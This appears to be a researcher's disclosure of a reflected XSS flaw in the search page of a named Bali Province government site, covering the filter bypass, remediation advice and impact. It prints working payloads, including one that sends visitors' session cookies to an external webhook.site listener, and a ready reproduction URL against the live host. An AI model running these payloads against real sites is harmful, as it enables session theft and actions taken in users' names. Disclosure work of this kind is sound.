I found a Reflected Cross-Site Scripting (XSS) vulnerability on the Indonesian government's Bali Province platform (baliprov.go.id). The flaw is in the page parameter of the search endpoint, where user input is reflected inside a JavaScript context without proper sanitization. Vulnerability Details

• Target: https://balisatudata-ng.baliprov.dev/search
• Vulnerable Parameter: page
• Injection Point: Inside a <script> tag within the this.fetchResults() function.

Technical Analysis & Bypass

The application filters double/single quotes (", ') and the plus sign (+). I bypassed this using Template Literals (backticks) and String Interpolation (${}).

How it looks in the source code:

this.fetchResults([INJECTION_HERE]);

By injecting 11); [CODE] ; //, I broke out of the function call and executed my own JS instructions. Payloads:

PoC: 11); alert(document.domain); //
Exfiltration: 11); window.location=https://webhook.site/ID?c=${document.cookie}; //

Steps to Reproduce:

1. Go to: https://balisatudata-ng.baliprov.dev/search?page=11)%3b+alert(document.cookie)%3b+%2f%2f&q=test
2. The script executes, and the cookie is displayed or sent to the external listener.

Impact:

• Session Hijacking: Stealing sensitive session cookies.
• Unauthorized Actions: Performing tasks as the logged-in user.
• Phishing: Redirecting users to malicious sites.

Solution

• Strict Validation: Allow only integer values for the page parameter.
• Output Encoding: Use proper encoding before reflecting any URL parameters into JavaScript.
• Author: Osama Alaa (Security Researcher)
• Bugcrowd LinkedIn GITHUB WEBSITE